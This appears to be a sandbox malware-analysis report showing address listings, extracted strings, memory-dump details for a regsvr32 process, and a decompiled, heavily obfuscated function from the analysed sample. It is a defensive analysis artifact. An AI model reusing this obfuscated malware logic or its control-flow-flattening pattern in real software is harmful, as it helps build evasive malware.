0x04b9d1fb
0x04b9d1fc
0x04b9d1fd
0x04b9d202
0x04b9d20d
0x04b9d210
0x04b9d21a
0x04b9d222
0x04b9d224
0x04b9d22c
0x04b9d231
0x04b9d236
0x04b9d23e
0x04b9d246
0x04b9d24e
0x04b9d256
0x04b9d25b
0x04b9d260
0x04b9d268
0x04b9d270
0x04b9d278
0x04b9d280
0x04b9d288
0x04b9d290
0x04b9d298
0x04b9d2a0
0x04b9d2ae
0x04b9d2b1
0x04b9d2b5
0x04b9d2ba
0x04b9d2c2
0x04b9d2ca
0x04b9d2d5
0x04b9d2e0
0x04b9d2eb
0x04b9d2f3
0x04b9d2fb
0x04b9d303
0x04b9d308
0x04b9d310
0x04b9d318
0x04b9d31d
0x04b9d325
0x04b9d330
0x04b9d33b
0x04b9d346
0x04b9d353
0x04b9d357
0x04b9d35c
0x04b9d361
0x04b9d369
0x04b9d371
0x04b9d376
0x04b9d37b
0x04b9d383
0x04b9d38b
0x04b9d390
0x04b9d398
0x04b9d3a0
0x04b9d3a5
0x04b9d3ad
0x04b9d3b5
0x04b9d3bd
0x04b9d3c8
0x04b9d3d5
0x04b9d3e0
0x04b9d3e8
0x04b9d3f6
0x04b9d3fb
0x04b9d401
0x04b9d409
0x04b9d411
0x04b9d419
0x04b9d421
0x04b9d429
0x04b9d431
0x04b9d436
0x04b9d43e
0x04b9d446
0x04b9d44e
0x04b9d456
0x04b9d45e
0x04b9d466
0x04b9d473
0x04b9d47b
0x04b9d47f
0x04b9d487
0x04b9d48f
0x04b9d494
0x04b9d49c
0x04b9d4a4
0x04b9d4ac
0x04b9d4b4
0x04b9d4bc
0x04b9d4c4
0x04b9d4cc
0x04b9d4d4
0x04b9d4dc
0x04b9d4e1
0x04b9d4e9
0x04b9d4f4
0x04b9d4fc
0x04b9d507
0x04b9d50f
0x04b9d51c
0x04b9d524
0x04b9d52c
0x04b9d53a
0x04b9d541
0x04b9d545
0x04b9d54d
0x04b9d555
0x04b9d55d
0x04b9d565
0x04b9d56d
0x04b9d575
0x04b9d57d
0x04b9d585
0x04b9d58d
0x04b9d597
0x04b9d59b
0x04b9d5a3
0x04b9d5ab
0x04b9d5b3
0x04b9d5b7
0x04b9d5bf
0x04b9d5c7
0x04b9d5d2
0x04b9d5dd
0x04b9d5e8
0x04b9d5e8
0x04b9d5e8
0x04b9d5ed
0x04b9d5ed
0x04b9d5ed
0x04b9d5ed
0x04b9d5f3
0x00000000
0x00000000
0x04b9d5f9
0x04b9d716
0x04b9d726
0x04b9d742
0x04b9d76a
0x04b9d76f
0x04b9d774
0x04b9d785
0x04b9d785
0x04b9d5e8
0x04b9d5e8
0x04b9d5e8
0x00000000
0x04b9d5e8
0x04b9d776
0x04b9d776
0x04b9d5e8
0x04b9d5e8
0x04b9d5e8
0x00000000
0x04b9d5e8
0x04b9d5e8
0x04b9d5ff
0x04b9d605
0x04b9d6dd
0x04b9d6ed
0x04b9d6df
0x04b9d6df
0x04b9d6df
0x04b9d6f2
0x04b9d6fb
0x04b9d700
0x00000000
0x04b9d60b
0x04b9d611
0x04b9d691
0x04b9d69a
0x04b9d69d
0x04b9d6a0
0x04b9d6a3
0x04b9d6a8
0x04b9d6ad
0x04b9d6ad
0x04b9d6b0
0x04b9d6b8
0x04b9d8c4
0x04b9d8ca
0x04b9d6be
0x04b9d6be
0x04b9d5e8
0x04b9d5e8
0x04b9d5e8
0x00000000
0x04b9d5e8
0x04b9d5e8
0x04b9d613
0x04b9d619
0x04b9d677
0x04b9d67c
0x04b9d681
0x04b9d687
0x04b9d5e8
0x04b9d5e8
0x04b9d5e8
0x00000000
0x04b9d5e8
0x04b9d5e8
0x04b9d61b
0x04b9d621
0x00000000
0x04b9d627
0x04b9d647
0x04b9d653
0x04b9d649
0x04b9d64b
0x04b9d650
0x04b9d650
0x04b9d658
0x04b9d5e8
0x04b9d5e8
0x04b9d5e8
0x00000000
0x04b9d5e8
0x04b9d5e8
0x04b9d621
0x04b9d619
0x04b9d611
0x04b9d605
0x04b9d8d1
0x04b9d8da
0x04b9d8da
0x04b9d795
0x04b9d87f
0x04b9d887
0x04b9d890
0x04b9d897
0x04b9d89c
0x04b9d8a3
0x04b9d8aa
0x00000000
0x04b9d79b
0x04b9d7a1
0x04b9d864
0x00000000
0x04b9d7a7
0x04b9d7ad
0x04b9d817
0x04b9d82a
0x04b9d845
0x04b9d84a
0x04b9d84d
0x04b9d8b1
0x04b9d8b1
0x00000000
0x04b9d7af
0x04b9d7b1
0x00000000
0x04b9d7b7
0x04b9d7ca
0x04b9d7cb
0x04b9d7d0
0x04b9d7dc
0x04b9d7dd
0x04b9d7de
0x04b9d7ee
0x04b9d7ef
0x04b9d7f4
0x04b9d7f7
0x00000000
0x04b9d7f7
0x04b9d7b1
0x04b9d7ad
0x04b9d7a1
0x00000000
0x04b9d8b6
0x04b9d8b6
0x00000000
0x04b9d8c2

Strings

}9, xrefs: 04B9D658
C:, xrefs: 04B9D268
ju~, xrefs: 04B9D429
}9, xrefs: 04B9D79B
aSa, xrefs: 04B9D5AB
yT, xrefs: 04B9D5A3
>g, xrefs: 04B9D5B7
8M, xrefs: 04B9D411
-c, xrefs: 04B9D3C8
0^, xrefs: 04B9D270
<9, xrefs: 04B9D31D
yT, xrefs: 04B9D592

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -c$0^$8M$>g$aSa$ju~$}9$}9$<9$C:$yT$yT
API String ID: 0-111235429
Opcode ID: 04caba5242240257e7ec29a20f6e8d044cee0803197158a72a3ea3186fbc101a
Instruction ID: 3b829adc0dcbc394b22e0b638bf133d7d4b237e854ac55c8e82d3ee628c3d529
Opcode Fuzzy Hash: 04caba5242240257e7ec29a20f6e8d044cee0803197158a72a3ea3186fbc101a
Instruction Fuzzy Hash: 830251711083809FD768CF26C48AA6BBBE5FBC4348F50891DE6DA86260D7B5D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B857B8, Relevance: 14.4, Strings: 11, Instructions: 616
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B857B8(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v8;
				void _v12;
				void _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				void* _t657;
				intOrPtr _t715;
				void* _t716;
				void* _t717;
				void* _t725;
				void* _t729;
				void* _t737;
				void* _t740;
				intOrPtr _t746;
				void* _t798;
				void* _t814;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				void* _t829;
				void* _t832;
				void* _t833;
				void* _t834;
				void* _t840;

				_push(_a24);
				_t746 = __edx;
				_push(_a20);
				_v224 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0x20);
				E04B9FE29(_t657);
				_v108 = 0x7f0a1;
				_t834 = _t833 + 0x20;
				_t832 = 0;
				_t740 = 0xa8b367c;
				_t816 = 0x72;
				_v108 = _v108 / _t816;
				_v108 = _v108 ^ 0x000011d4;
				_v220 = 0x3ea28;
				_v220 = _v220 | 0x6e60dce4;
				_v220 = _v220 << 0xd;
				_v220 = _v220 ^ 0x7fdd8000;
				_v272 = 0xf906dc;
				_v272 = _v272 + 0x5e9;
				_t817 = 0x7a;
				_v272 = _v272 * 0x15;
				_v272 = _v272 << 0xb;
				_v272 = _v272 ^ 0x70614800;
				_v264 = 0x600b37;
				_v264 = _v264 / _t817;
				_v264 = _v264 ^ 0x262493f0;
				_t818 = 0x3e;
				_v264 = _v264 * 0x11;
				_v264 = _v264 ^ 0x886a01f8;
				_v260 = 0xf3d497;
				_v260 = _v260 / _t818;
				_v260 = _v260 >> 6;
				_v260 = _v260 >> 3;
				_v260 = _v260 ^ 0x000001f7;
				_v156 = 0x8d2235;
				_v156 = _v156 >> 0xe;
				_t819 = 0xe;
				_v156 = _v156 * 0x5b;
				_v156 = _v156 ^ 0x0000c87c;
				_v292 = 0xf4d;
				_v292 = _v292 + 0x4732;
				_v292 = _v292 << 0x10;
				_v292 = _v292 << 0xe;
				_v292 = _v292 ^ 0xc0000000;
				_v216 = 0x258eaf;
				_v216 = _v216 * 0x48;
				_v216 = _v216 / _t819;
				_v216 = _v216 ^ 0x00c126f1;
				_v96 = 0xf75e54;
				_v96 = _v96 + 0xffff74b2;
				_v96 = _v96 ^ 0x00f6d306;
				_v268 = 0x92da;
				_v268 = _v268 >> 0xc;
				_v268 = _v268 + 0x1646;
				_v268 = _v268 << 0xd;
				_v268 = _v268 ^ 0x02c9e000;
				_v196 = 0xf0429c;
				_t820 = 0x3d;
				_v196 = _v196 * 0x60;
				_v196 = _v196 >> 3;
				_v196 = _v196 ^ 0x0b431f50;
				_v232 = 0x6bfae5;
				_v232 = _v232 / _t820;
				_v232 = _v232 >> 4;
				_v232 = _v232 * 0x6e;
				_v232 = _v232 ^ 0x000c2b3c;
				_v40 = 0xa24143;
				_v40 = _v40 + 0xffff9191;
				_v40 = _v40 ^ 0x00a231cd;
				_v80 = 0x435983;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000556e3;
				_v180 = 0x94eafd;
				_v180 = _v180 + 0x1d08;
				_v180 = _v180 | 0xe944a694;
				_v180 = _v180 ^ 0xe9df3ebb;
				_v228 = 0xbcce84;
				_v228 = _v228 + 0xffff815d;
				_v228 = _v228 ^ 0xe4fbb881;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x0005fd7e;
				_v112 = 0x2fdad;
				_v112 = _v112 ^ 0x4ab81af1;
				_v112 = _v112 ^ 0x4abb9e1a;
				_v64 = 0x50dc85;
				_v64 = _v64 + 0xffff4d8c;
				_v64 = _v64 ^ 0x005cdb40;
				_v52 = 0x47f34d;
				_v52 = _v52 + 0xffff898a;
				_v52 = _v52 ^ 0x004c7feb;
				_v72 = 0xc369b0;
				_v72 = _v72 * 0x64;
				_v72 = _v72 ^ 0x4c5d6799;
				_v132 = 0xe6e6b0;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 * 0x6c;
				_v132 = _v132 ^ 0x00059f00;
				_v172 = 0x544ea4;
				_v172 = _v172 << 5;
				_v172 = _v172 | 0xc018668b;
				_v172 = _v172 ^ 0xca962b34;
				_v148 = 0x61f17d;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 + 0xffff8980;
				_v148 = _v148 ^ 0xfffa8c30;
				_v100 = 0xf619bc;
				_v100 = _v100 >> 0xa;
				_v100 = _v100 ^ 0x00008a95;
				_v200 = 0xa94e7a;
				_v200 = _v200 + 0xa696;
				_v200 = _v200 + 0xffff4550;
				_v200 = _v200 ^ 0x00a03757;
				_v208 = 0x57e0ef;
				_v208 = _v208 ^ 0x592bbff9;
				_v208 = _v208 ^ 0x4b5d2b88;
				_v208 = _v208 ^ 0x1221726f;
				_v284 = 0x804076;
				_v284 = _v284 ^ 0x9dc3529f;
				_v284 = _v284 + 0x2ad8;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0xa19e17b3;
				_v176 = 0xb506b1;
				_v176 = _v176 | 0xc528794d;
				_v176 = _v176 + 0x810e;
				_v176 = _v176 ^ 0xc5bbfa9c;
				_v184 = 0x64408f;
				_v184 = _v184 << 3;
				_v184 = _v184 >> 0xf;
				_v184 = _v184 ^ 0x00066ce1;
				_v252 = 0x9e8dfe;
				_v252 = _v252 | 0x2316ff28;
				_v252 = _v252 + 0xbb4b;
				_v252 = _v252 ^ 0x205df49d;
				_v252 = _v252 ^ 0x03c75996;
				_v192 = 0x20a385;
				_v192 = _v192 ^ 0x2edbbce0;
				_v192 = _v192 >> 5;
				_v192 = _v192 ^ 0x017066cd;
				_v312 = 0x989161;
				_v312 = _v312 + 0xa008;
				_v312 = _v312 + 0x4ac;
				_v312 = _v312 | 0x9f8d4417;
				_v312 = _v312 ^ 0x9f9ed397;
				_v320 = 0x6ba986;
				_t821 = 0x4d;
				_v320 = _v320 * 0x35;
				_v320 = _v320 + 0x6b8c;
				_v320 = _v320 + 0x347b;
				_v320 = _v320 ^ 0x164ad328;
				_v236 = 0xcaa528;
				_v236 = _v236 + 0x2035;
				_v236 = _v236 | 0x7bffa27f;
				_v236 = _v236 ^ 0x7bfdb1d6;
				_v276 = 0xb040eb;
				_v276 = _v276 * 0x3a;
				_v276 = _v276 >> 2;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x00065548;
				_v280 = 0xf1680b;
				_v280 = _v280 >> 0xa;
				_v280 = _v280 >> 1;
				_v280 = _v280 >> 0xd;
				_v280 = _v280 ^ 0x00049c20;
				_v288 = 0x575f50;
				_v288 = _v288 << 0xe;
				_v288 = _v288 | 0xa77b0e2e;
				_v288 = _v288 * 0x52;
				_v288 = _v288 ^ 0x6fbbe03a;
				_v296 = 0x568d1e;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 >> 6;
				_v296 = _v296 >> 9;
				_v296 = _v296 ^ 0x0008fa1d;
				_v304 = 0xd1fef6;
				_v304 = _v304 << 0x10;
				_v304 = _v304 * 0x2d;
				_v304 = _v304 << 9;
				_v304 = _v304 ^ 0x7c01ef7f;
				_v92 = 0xea5a63;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0x4b4e4928;
				_v76 = 0xf64e35;
				_v76 = _v76 + 0xbf9b;
				_v76 = _v76 ^ 0x00fbc5d2;
				_v248 = 0xc75c6;
				_v248 = _v248 ^ 0x54d7d0af;
				_v248 = _v248 / _t821;
				_v248 = _v248 | 0x9c98695d;
				_v248 = _v248 ^ 0x9d9ac3a5;
				_v256 = 0x504a74;
				_v256 = _v256 | 0x8719e45c;
				_v256 = _v256 * 0x7b;
				_v256 = _v256 ^ 0x8d2796a4;
				_v256 = _v256 ^ 0x85162cc6;
				_v84 = 0x519e4e;
				_v84 = _v84 ^ 0x8be7953d;
				_v84 = _v84 ^ 0x8bbbe938;
				_v168 = 0x311266;
				_v168 = _v168 ^ 0x18ab2cb8;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x3478f01c;
				_v60 = 0x61fbf7;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 ^ 0x000e504b;
				_v240 = 0xf8ae17;
				_v240 = _v240 >> 3;
				_v240 = _v240 | 0x050ada64;
				_v240 = _v240 ^ 0x567c7cbc;
				_v240 = _v240 ^ 0x53659cbf;
				_v68 = 0xee6d4a;
				_t374 =  &_v68; // 0xee6d4a
				_t822 = 0x49;
				_v68 =  *_t374 * 0xf;
				_v68 = _v68 ^ 0x0dff5dbc;
				_v300 = 0x550c32;
				_v300 = _v300 * 0x12;
				_v300 = _v300 + 0xffff8d7f;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x0bfb5da9;
				_v124 = 0x6baac1;
				_v124 = _v124 * 0x60;
				_t823 = 0x6f;
				_v124 = _v124 / _t822;
				_v124 = _v124 ^ 0x0084cf47;
				_v188 = 0xec1707;
				_v188 = _v188 << 0xc;
				_v188 = _v188 + 0x1505;
				_v188 = _v188 ^ 0xc1795754;
				_v244 = 0xd962f7;
				_v244 = _v244 + 0xffffa966;
				_v244 = _v244 | 0x93df07c8;
				_v244 = _v244 >> 1;
				_v244 = _v244 ^ 0x49e87f80;
				_v48 = 0x35494e;
				_v48 = _v48 / _t823;
				_v48 = _v48 ^ 0x000830fa;
				_v88 = 0x633bdd;
				_v88 = _v88 + 0xc138;
				_v88 = _v88 ^ 0x006a2257;
				_v56 = 0x559d1c;
				_v56 = _v56 + 0xffff12d8;
				_v56 = _v56 ^ 0x005735ca;
				_v104 = 0xdd1aac;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0x0dd90d21;
				_v44 = 0x4278da;
				_t824 = 0x4e;
				_v44 = _v44 * 0x42;
				_v44 = _v44 ^ 0x112c636d;
				_v116 = 0x4ec2e;
				_v116 = _v116 + 0xffff43d8;
				_v116 = _v116 ^ 0x00065017;
				_v308 = 0xc5e4c2;
				_v308 = _v308 * 0x26;
				_v308 = _v308 + 0xa26d;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x25c4a583;
				_v36 = 0x60fc2;
				_v36 = _v36 * 0x2e;
				_v36 = _v36 ^ 0x011987ae;
				_v140 = 0x8a5839;
				_v140 = _v140 << 0xb;
				_v140 = _v140 / _t824;
				_v140 = _v140 ^ 0x010a1534;
				_t814 = 0x30e419;
				_v204 = 0x180842;
				_v204 = _v204 ^ 0x577ac785;
				_v204 = _v204 + 0x1256;
				_v204 = _v204 ^ 0x5761cb73;
				_v136 = 0xcc77c3;
				_v136 = _v136 | 0x2e5c8e9b;
				_t825 = 0x3c;
				_v12 = 0xc2dfee2;
				_v16 = 0x8d06406;
				_v136 = _v136 * 0x19;
				_v136 = _v136 ^ 0x93985978;
				_v144 = 0xcb98e2;
				_v144 = _v144 ^ 0x2e2af391;
				_v144 = _v144 + 0xffff95d2;
				_v144 = _v144 ^ 0x2ee989ff;
				_v152 = 0x6e8dcb;
				_v152 = _v152 * 0x64;
				_v152 = _v152 ^ 0xf6de88b0;
				_v152 = _v152 ^ 0xddf9340f;
				_v160 = 0x1f41c3;
				_v160 = _v160 / _t825;
				_v160 = _v160 ^ 0x710c49d1;
				_v160 = _v160 ^ 0x7106b0fc;
				_v164 = 0xea0060;
				_v164 = _v164 << 2;
				_t826 = 0x54;
				_v164 = _v164 * 0x51;
				_v164 = _v164 ^ 0x2820691f;
				_v212 = 0x1a562c;
				_v212 = _v212 + 0xffff6884;
				_v212 = _v212 / _t826;
				_v212 = _v212 ^ 0x000ca439;
				_v316 = 0xc049a;
				_t827 = 0x4a;
				_v316 = _v316 / _t827;
				_v316 = _v316 >> 0xd;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x000978cf;
				_v120 = 0xbc159f;
				_t828 = 0x75;
				_v120 = _v120 * 0x6f;
				_t829 = 0x3acf932;
				_v120 = _v120 / _t828;
				_v120 = _v120 ^ 0x00bb77de;
				_v128 = 0x83c7e3;
				_v128 = _v128 ^ 0x1c1c3aef;
				_v128 = _v128 ^ 0x03a71d14;
				_v128 = _v128 ^ 0x1f3d9b10;
				while(1) {
					L1:
					while(1) {
						do {
							while(1) {
								L3:
								_t840 = _t740 - 0x6051746;
								if(_t840 <= 0) {
									break;
								}
								__eflags = _t740 - 0x644521d;
								if(_t740 == 0x644521d) {
									E04BA12C1(_v32, _v136, _v144, _v152, _v160);
									_t740 = 0x4160ee8;
									goto L25;
								} else {
									__eflags = _t740 - 0x8d06406;
									if(_t740 == 0x8d06406) {
										_push(_t746);
										_push(_t746);
										_t715 = E04B8C5D8(_v20);
										_t746 = _v224;
										_t834 = _t834 + 0xc;
										__eflags = _t715;
										_v24 = _t715;
										_t798 = 0x26ffc0;
										_t740 =  !=  ? 0x26ffc0 : _t814;
										_t716 = 0x5dc2900;
										continue;
									} else {
										__eflags = _t740 - 0xa8b367c;
										if(__eflags == 0) {
											_t740 = 0x6051746;
											continue;
										} else {
											__eflags = _t740 - 0xc2dfee2;
											if(__eflags == 0) {
												_push(_v276);
												_push(_v236);
												_push(_v320);
												_t737 = E04B8F288(_v272, _v280, E04B9E1F8(0x4b813f8, _v312, __eflags), _v288,  &_v8,  &_v20, _v296, 0x4b813f8, _v304, _v28, _v92);
												_t834 = _t834 + 0x30;
												__eflags = _t737 - _v264;
												_t740 =  ==  ? _v16 : _t814;
												E04B9FECB(_t734, _v76, _v248, _v256, _v84);
												L16:
												_t829 = 0x3acf932;
												L25:
												_t746 = _v224;
												_t834 = _t834 + 0xc;
												_t798 = 0x26ffc0;
											}
											goto L26;
										}
									}
								}
								L29:
								return _t832;
							}
							if(_t840 == 0) {
								_push(_v228);
								_push(_v180);
								_push(_v80);
								_t717 = E04B9E1F8(0x4b813a8, _v40, __eflags);
								_push(_v72);
								_push(_v52);
								_push(_v64);
								__eflags = E04B8738A(_v132, _t717, _v172, _v108,  &_v28, E04B9E1F8(0x4b81318, _v112, __eflags), _v148) - _v220;
								_t740 =  ==  ? _v12 : 0x1841daf;
								E04B9FECB(_t717, _v100, _v200, _v208, _v284);
								_t834 = _t834 + 0x38;
								E04B9FECB(_t718, _v176, _v184, _v252, _v192);
								_t814 = 0x30e419;
								goto L16;
							} else {
								if(_t740 == _t798) {
									_t725 = E04B81BC9(_v260, _v28, _v300, _v124, _v20, _v188, _v244, _v156, _v24,  &_v32, _v48, _v88);
									_t834 = _t834 + 0x2c;
									__eflags = _t725 - _v292;
									_t746 = _v224;
									_t716 = 0x5dc2900;
									_t740 =  ==  ? 0x5dc2900 : 0x4160ee8;
									goto L3;
								} else {
									if(_t740 == _t814) {
										E04B8F7FE(_v120, _v28, _v128, _v232);
									} else {
										if(_t740 == _t829) {
											_t729 = E04B822C9(_v308, _v36, _v32, 0x20, _a20, _v140, _v204, _v268);
											_t834 = _t834 + 0x18;
											_t740 = 0x644521d;
											__eflags = _t729 - _v196;
											_t832 =  ==  ? 1 : _t832;
											goto L11;
										} else {
											if(_t740 == 0x4160ee8) {
												E04BA2B09(_v164, _v24, _v212, _v316);
												_t740 = _t814;
												goto L11;
											} else {
												if(_t740 != _t716) {
													goto L26;
												} else {
													E04B9CBE9(_v216, _a12, _v56, _t746, _v104, _v44, _v116, _v32);
													_t834 = _t834 + 0x18;
													_t740 =  ==  ? _t829 : 0x644521d;
													L11:
													_t746 = _v224;
													goto L1;
												}
											}
										}
									}
								}
							}
							goto L29;
							L26:
							__eflags = _t740 - 0x1841daf;
						} while (__eflags != 0);
						goto L29;
					}
				}
			}

0x04b857c2
0x04b857c9
0x04b857cb
0x04b857d2
0x04b857d6
0x04b857dd
0x04b857e4
0x04b857eb
0x04b857f2
0x04b857f3
0x04b857f5
0x04b857fa
0x04b85805
0x04b85811
0x04b85813
0x04b8581a
0x04b8581f
0x04b85828
0x04b85833
0x04b8583b
0x04b85843
0x04b85848
0x04b85850
0x04b85858
0x04b85865
0x04b85868
0x04b8586c
0x04b85871
0x04b85879
0x04b85889
0x04b8588d
0x04b8589a
0x04b8589d
0x04b858a1
0x04b858a9
0x04b858b9
0x04b858bd
0x04b858c2
0x04b858c7
0x04b858cf
0x04b858da
0x04b858ea
0x04b858eb
0x04b858f2
0x04b858fd
0x04b85905
0x04b8590d
0x04b85912
0x04b85917
0x04b8591f
0x04b8592c
0x04b85936
0x04b8593a
0x04b85942
0x04b8594d
0x04b85958
0x04b85963
0x04b8596b
0x04b85972
0x04b8597a
0x04b8597f
0x04b85987
0x04b8599c
0x04b8599d
0x04b859a4
0x04b859ac
0x04b859b7
0x04b859c5
0x04b859c9
0x04b859d3
0x04b859d7
0x04b859df
0x04b859ea
0x04b859f5
0x04b85a00
0x04b85a0b
0x04b85a13
0x04b85a1e
0x04b85a29
0x04b85a34
0x04b85a3f
0x04b85a4a
0x04b85a52
0x04b85a5a
0x04b85a62
0x04b85a67
0x04b85a6f
0x04b85a7a
0x04b85a85
0x04b85a90
0x04b85a9b
0x04b85aa6
0x04b85ab1
0x04b85abc
0x04b85ac7
0x04b85ad2
0x04b85ae5
0x04b85aec
0x04b85af7
0x04b85b02
0x04b85b12
0x04b85b19
0x04b85b24
0x04b85b2f
0x04b85b37
0x04b85b42
0x04b85b4d
0x04b85b58
0x04b85b60
0x04b85b6b
0x04b85b76
0x04b85b81
0x04b85b89
0x04b85b94
0x04b85b9f
0x04b85baa
0x04b85bb5
0x04b85bc0
0x04b85bcb
0x04b85bd6
0x04b85be1
0x04b85bec
0x04b85bf4
0x04b85bfc
0x04b85c04
0x04b85c09
0x04b85c11
0x04b85c1c
0x04b85c27
0x04b85c32
0x04b85c3d
0x04b85c4a
0x04b85c52
0x04b85c5a
0x04b85c65
0x04b85c6d
0x04b85c75
0x04b85c7d
0x04b85c85
0x04b85c8d
0x04b85c98
0x04b85ca3
0x04b85cab
0x04b85cb6
0x04b85cbe
0x04b85cc6
0x04b85cce
0x04b85cd6
0x04b85cde
0x04b85ced
0x04b85cee
0x04b85cf2
0x04b85cfa
0x04b85d02
0x04b85d0a
0x04b85d12
0x04b85d1a
0x04b85d22
0x04b85d2a
0x04b85d37
0x04b85d3b
0x04b85d40
0x04b85d45
0x04b85d4d
0x04b85d55
0x04b85d5a
0x04b85d5e
0x04b85d63
0x04b85d6b
0x04b85d73
0x04b85d78
0x04b85d85
0x04b85d89
0x04b85d91
0x04b85d99
0x04b85d9e
0x04b85da3
0x04b85da8
0x04b85db0
0x04b85db8
0x04b85dc2
0x04b85dc6
0x04b85dcb
0x04b85dd3
0x04b85dde
0x04b85de6
0x04b85df1
0x04b85dfc
0x04b85e07
0x04b85e12
0x04b85e1a
0x04b85e28
0x04b85e2c
0x04b85e34
0x04b85e3c
0x04b85e44
0x04b85e51
0x04b85e55
0x04b85e5d
0x04b85e65
0x04b85e70
0x04b85e7b
0x04b85e86
0x04b85e93
0x04b85e9e
0x04b85ea6
0x04b85eb1
0x04b85ebc
0x04b85ec4
0x04b85ecf
0x04b85ed7
0x04b85edc
0x04b85ee4
0x04b85eec
0x04b85ef4
0x04b85eff
0x04b85f09
0x04b85f0c
0x04b85f13
0x04b85f1e
0x04b85f2b
0x04b85f2f
0x04b85f37
0x04b85f3b
0x04b85f43
0x04b85f56
0x04b85f66
0x04b85f67
0x04b85f70
0x04b85f7b
0x04b85f86
0x04b85f8e
0x04b85f99
0x04b85fa4
0x04b85fac
0x04b85fb4
0x04b85fbc
0x04b85fc0
0x04b85fc8
0x04b85fde
0x04b85fe5
0x04b85ff0
0x04b85ffb
0x04b86006
0x04b86011
0x04b8601c
0x04b86027
0x04b86032
0x04b8603d
0x04b86045
0x04b86050
0x04b86063
0x04b86064
0x04b8606b
0x04b86076
0x04b86081
0x04b8608c
0x04b86097
0x04b860a4
0x04b860a8
0x04b860b0
0x04b860b5
0x04b860bd
0x04b860d0
0x04b860d7
0x04b860e2
0x04b860ed
0x04b86102
0x04b8610b
0x04b86116
0x04b8611b
0x04b86126
0x04b86131
0x04b8613c
0x04b86147
0x04b86152
0x04b86165
0x04b86168
0x04b86173
0x04b8617e
0x04b86185
0x04b86190
0x04b8619b
0x04b861a6
0x04b861b1
0x04b861bc
0x04b861cf
0x04b861d6
0x04b861e1
0x04b861ec
0x04b86202
0x04b86209
0x04b86214
0x04b8621f
0x04b8622a
0x04b8623a
0x04b8623d
0x04b86244
0x04b8624f
0x04b8625a
0x04b86270
0x04b86277
0x04b86282
0x04b8628e
0x04b86293
0x04b86299
0x04b8629e
0x04b862a3
0x04b862ab
0x04b862be
0x04b862bf
0x04b862cf
0x04b862d4
0x04b862db
0x04b862e6
0x04b862f1
0x04b862fc
0x04b86307
0x04b86312
0x04b86312
0x04b86317
0x04b8631c
0x04b8631c
0x04b8631c
0x04b8631c
0x04b86322
0x00000000
0x00000000
0x04b86578
0x04b8657e
0x04b866b2
0x04b866b7
0x00000000
0x04b86584
0x04b86584
0x04b8658a
0x04b8665a
0x04b8665b
0x04b86663
0x04b86668
0x04b8666f
0x04b86672
0x04b86674
0x04b8667d
0x04b86682
0x04b86685
0x00000000
0x04b86590
0x04b86590
0x04b86596
0x04b86637
0x00000000
0x04b8659c
0x04b8659c
0x04b865a2
0x04b865a8
0x04b865b1
0x04b865b5
0x04b865fb
0x04b86600
0x04b8660b
0x04b86616
0x04b8662d
0x04b8656e
0x04b8656e
0x04b866bc
0x04b866bc
0x04b866c3
0x04b866cb
0x04b866cb
0x00000000
0x04b865a2
0x04b86596
0x04b8658a
0x04b86700
0x04b8670a
0x04b8670a
0x04b86328
0x04b8648f
0x04b86498
0x04b8649f
0x04b864ad
0x04b864bc
0x04b864c3
0x04b864ca
0x04b8651c
0x04b86524
0x04b86541
0x04b86546
0x04b86564
0x04b86569
0x00000000
0x04b8632e
0x04b86330
0x04b86469
0x04b86470
0x04b8647c
0x04b8647e
0x04b86482
0x04b86487
0x00000000
0x04b86336
0x04b86338
0x04b866f7
0x04b8633e
0x04b86340
